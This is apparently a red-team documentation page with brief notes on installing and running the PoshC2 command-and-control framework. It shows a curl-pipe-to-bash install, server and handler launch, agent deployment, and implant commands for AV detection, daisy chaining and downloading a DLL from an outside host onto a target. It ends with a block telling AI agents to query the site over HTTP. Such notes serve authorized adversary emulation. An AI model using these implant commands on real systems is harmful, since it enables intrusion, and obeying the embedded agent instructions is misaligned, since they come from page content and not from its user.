# PoshC2

PoshC2 is pretty well documented, below are my notes. Best to use the official documentation: <https://poshc2.readthedocs.io/en/latest/>

Demo of PoshC2 is in this [Red Team Village](https://redteamvillage.io/) and [Texas Cyber Summit](https://www.texascybersummit.org/) [June'gle](http://junegle.com/) event:

{% embed url="<https://www.youtube.com/watch?v=Fa4GHF_OVVc>" %}

## Install PoshC2

```
sudo su -
curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2/master/Install.sh | bash
```

## Configure and Run PoshC2

```
sudo su -
cd /opt/PoshC2
posh-project -n test
posh-config
```

Modify the values in the file, consider: BindIP; PayloadCommsHost; UserAgent

### Launch Server

```
sudo su -
posh-server
```

On launch, PoshC2 generates a number of payloads into /opt/PoshC2\_Project and creates a quick start file.

```
 cat /opt/PoshC2_Project/quickstart.txt
```

### Launch Handler

```
sudo su -
posh -u georgy
```

### Deploy Agent

Use the multitude of methods to deploy the agent from the quickstart.txt file.

## Emulate TTPs

### Run PowerShell Scripts

```
loadmodule /home/slingshot/CozyBear/stepTwelve.ps1 
detectav
software
```

### Chaining

Run the following command from the implant you want to use as the daisy server.

```
startdaisy
```

### Download a file

```
web-upload-file -from 'https://mint.scythedemo.com/ServiceLogin?passive=Gc5H5HZdakKD8ZWuaUcX2Q&b=true' -to 'C:\Users\Jorge\Desktop\scythe.dll'
```

## Other Resources

* <https://redteaming.co.uk/2020/06/26/poshc2-shellcode-and-binary-patching/>
* <https://yaksas.in/ycscblog/poshc2-a-red-teamers-notes/>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://howto.thec2matrix.com/c2/poshc2.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.